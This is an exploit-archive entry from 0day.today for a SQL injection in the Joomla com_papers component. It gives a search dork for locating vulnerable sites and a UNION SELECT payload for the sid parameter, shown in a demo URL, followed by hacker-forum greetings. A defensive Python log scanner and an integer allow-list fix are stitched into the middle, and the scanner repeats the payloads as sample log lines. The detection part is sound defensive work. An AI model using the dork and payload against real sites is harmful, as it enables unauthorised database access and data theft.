Joomla Component com_papers SQL Injection Vulnerability

2010-04-11T00:00:00
ID 1337DAY-ID-11711
Type zdt
Reporter bumble_be
Modified 2010-04-11T00:00:00

Description

Exploit for the PHP platform, in the web applications category

                                        
=======================================================
Joomla Component com_papers SQL Injection Vulnerability
=======================================================

# Exploit Title: joomla component papers SQL injection Vulnerability
# Author: bumble_be
# Software Link: N/A
# Tested on: Windows XP 2

======================================================================
[x] author : bumble_be ([email protected])
[x] dork   : inurl:option=com_papers
[x] myweb  : http://linggau-haxor.com
======================================================================

==== SQLI EXPLOIT ====
/**/ AND /**/ 1=2 /**/ UNION+SELECT /**/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--



==== VULN IN HERE ====

http://localhost/xampp/joomla/index.php?option=com_papers&task=details&sid=943[c0de]



==== LIVE DEMO ====

http://localhost/xampp/joomla/index.php?option=com_papers&task=details&sid=943 /**/ AND+1=2 /**/ UNION /**/ SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 /*
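
A defensive check for the parameter shown above, as an added example that is not part of the original advisory: it scans web-server access logs for com_papers requests whose sid value is not a plain integer. The log lines are constructed, and treating sid as a numeric record ID is an assumption based on the sid=943 value in the URL above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (abbreviated Apache format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Apr/2010:10:00:01 +0000] "GET /index.php?option=com_papers&task=details&sid=943 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [11/Apr/2010:10:00:05 +0000] "GET /index.php?option=com_papers&task=details&sid=943+/**/+AND+1=2+/**/+UNION+/**/+SELECT+1,2,3 HTTP/1.1" 200 4031',
    '203.0.113.4 - - [11/Apr/2010:10:00:09 +0000] "GET /index.php?option=com_papers&task=details&sid=943%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%201 HTTP/1.1" 200 4031',
    '198.51.100.7 - - [11/Apr/2010:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8800',
    '203.0.113.8 - - [11/Apr/2010:10:00:15 +0000] "GET /index.php?option=com_papers&task=details&sid=943&sid=1%27 HTTP/1.1" 500 312',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: sid is a numeric ID, so an allow-list of ASCII digits is enough.
SID_OK = re.compile(r'[0-9]{1,10}')


def check_line(line):
    """Return (client_ip, bad_sid) for a suspicious com_papers request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    # parse_qs percent-decodes and turns '+' into a space, so encoded and
    # plain forms of the same payload are compared after normalisation.
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_papers" not in query.get("option", []):
        return None
    # Check every sid value: a repeated parameter must not hide a bad one.
    for sid in query.get("sid", []):
        if not SID_OK.fullmatch(sid):
            return line.split(" ", 1)[0], sid
    return None


def scan(lines):
    """Return all (client_ip, bad_sid) hits found in an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit]


if __name__ == "__main__":
    for ip, sid in scan(SAMPLE_LOG):
        print(f"non-numeric sid from {ip}: {sid!r}")
```

The same allow-list, applied in the component before sid reaches the query, is the fix; matching on keywords such as UNION is not needed once anything that is not an integer is rejected.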


[x]-------------------------------------------------------------------

GREETZ TO WE FORUM:
DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID

[x]-------------------------------------------------------------------

MY BROTHA :
mywisdom,whitehat spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker

[x]-------------------------------------------------------------------

note: begin everything by saying bismillah

[X]-------------------------------------------------------------------
INDONESIA STILL UP AND WE NOT DEAD :0



#  0day.today [2018-04-09]  #